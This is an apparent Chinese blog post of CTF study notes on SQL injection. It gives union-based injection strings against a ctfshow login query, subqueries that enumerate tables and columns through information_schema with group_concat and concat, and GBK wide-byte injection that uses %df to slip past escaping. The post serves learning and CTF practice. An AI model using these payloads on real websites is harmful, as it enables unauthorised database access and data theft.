CTF常用sql注入(一)联合注入和宽字节

0x01 前言

给自己总结一下sql注入的常用姿势吧,记录一下学习

0x02 联合

联合注入的关键词是union

SQL的union联合注入原理是联合两个表进行注入攻击,使用union select关键词来进行联合查询。

那么为什么我们在题目中一般是只写一个呢

因为

复制代码
 $sql = "select * from ctfshow_user where pass = '{$password}' and username = '{$username}';";

那么我们在进行闭合之后前面的语句进行查询之后已经算是一个表了,所以我们直接衔接就可以了

复制代码
username=-1' union select 1,2,3--+&pass=1

变成了

复制代码
 $sql = "select * from ctfshow_user where pass = '1' and username = '-1' union select 1,2,3--+';";

成功就把两句连接起来

结果也表明了只要列一样就可以实现注入,这也省去了order by的查列

而仅仅这样子是很难写出一个完整的注入语句的,所以我们这里使用到了子查询,就是在其中在衔接一个sql语句

复制代码
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),3--+

在此也顺便讲讲一个小东西

0x03 group_concat和concat

那就是我们最常用的group_concatconcat,这两者的区别在下

复制代码
group_concat
这个函数是用来连接竖着的东西,简单点来说就是我有一个表
+-------+------------+-----------+
| score | student_id | course_id |
+-------+------------+-----------+
| 70.5  |          1 |         1 |
| 98.5  |          1 |         3 |
| 33.0  |          1 |         5 |
| 98.0  |          1 |         6 |
| 60.0  |          2 |         1 |
| 59.5  |          2 |         5 |
| 33.0  |          3 |         1 |
| 68.0  |          3 |         3 |
| 99.0  |          3 |         5 |
| 67.0  |          4 |         1 |
| 23.0  |          4 |         3 |
| 56.0  |          4 |         5 |
| 72.0  |          4 |         6 |
| 81.0  |          5 |         1 |
| 37.0  |          5 |         5 |
| 56.0  |          6 |         2 |
| 43.0  |          6 |         4 |
| 79.0  |          6 |         6 |
| 80.0  |          7 |         2 |
| 92.0  |          7 |         6 |
+-------+------------+-----------+
20 rows in set (0.04 sec)
你运用group_concat()这个函数来查询列名的话,就会回显 score,student_id,course_id

什么时候使用呢就是当回显为

Subquery returns more than 1 row

concat的话就是横着连接,就是把你查询的东西和你拼接的符号连接了

复制代码
?id=-1' union select 1,concat(0x3d,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x3d),3--+

0x3d是'='     ,嗯差不多这个意思吧,主要就是在报错注入中使用

0x04 宽字节

我们怎么看是否存在宽字节注入呢

就是转移符号\,他会影响我们对'的闭合,从而影响注入

复制代码
此时 php 会根据数据库中的编码自动来确定使用那种编码,
可以使用 <?php $m="字"; echo strlen($m); 来进行判断,
如果输出的值是3说明是utf-8编码;如果输出的值是 2 说明是 gbk 编码。

mysql 数据库在使用宽字节(GBK)编码时,会认为两个字符是一个汉字(前一个ascii码要大于128(比如%df),才到汉字的范围)
那么我们就可以把转义字符正常解析从而正常闭合sql语句进行SQL注入

有转义字符,考虑宽字节注入

成功

相关推荐
杨云龙UP16 小时前
SQL Server2022部署:Windows Server 2016下安装、SSMS配置、备份还原与1433端口放通全流程_20260508
运维·服务器·数据库·sql·sqlserver·2022
墨染天姬17 小时前
【AI】cursor提示词小技巧
前端·数据库·人工智能
古月-一个C++方向的小白18 小时前
MySQL数据库——数据类型
android·数据库·mysql
qq_4135020219 小时前
如何创建CDB公共用户_C##前缀强制规则与CONTAINER=ALL
jvm·数据库·python
逸Y 仙X19 小时前
文章二十七:ElasticSearch ES查询模板(Search Template)高效复用实战
java·大数据·数据库·elasticsearch·搜索引擎·全文检索
m0_7381207219 小时前
应急响应(重点)——记一次某公司流量应急溯源分析(附带下载链接)
服务器·前端·数据库·安全·web安全·网络安全
yexuhgu19 小时前
CSS如何利用-checked实现纯CSS手风琴折叠_通过状态选择器控制区域高度
jvm·数据库·python
2301_7796224120 小时前
mysql如何通过主从备份实现读写分离_配置mysql架构模式
jvm·数据库·python
其实防守也摸鱼20 小时前
无线网络安全--实验 规避WLAN验证之发现隐藏的SSID
java·开发语言·网络·安全·web安全·智能路由器·无线网络安全